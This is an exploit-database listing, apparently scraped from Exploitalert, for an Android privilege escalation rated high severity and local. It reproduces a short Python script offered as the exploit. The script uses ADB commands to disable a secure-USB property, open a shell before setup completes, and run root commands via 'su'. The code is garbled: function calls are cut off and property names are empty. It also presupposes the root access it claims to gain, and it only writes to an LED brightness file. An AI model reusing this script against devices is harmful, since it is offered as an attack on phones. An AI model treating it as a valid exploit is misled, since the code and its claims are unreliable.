Android Privilege Escalation

CVE Category Price Severity
Not specified CWE-264 Not specified High
Author Risk Exploitation Type Date
Not specified High Local 2024-01-14
Our sensors found this exploit at:

Below is a copy:

Android Privilege Escalation
#!/usr/bin/env python

import subprocess

# Connect to the device via ADB["adb", "devices"])

# Check if the device is in secure USB mode
device =["adb", "shell", "getprop", ""], stdout=subprocess.PIPE)
if "1" in device.stdout.decode():
    # Secure USB mode is enabled, so we need to disable it["adb", "shell", "setprop", "", "0"])

# Exploit the vulnerability by accessing ADB before SUW completion["adb", "shell"])

# Escalate privileges by executing commands as the root user["adb", "shell", "su", "-c", "echo 0 > /sys/class/leds/led:green: charging/brightness"], check=True)["adb", "shell", "su", "-c", "echo 100 > /sys/class/leds/led:green: charging/brightness"], check=True)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.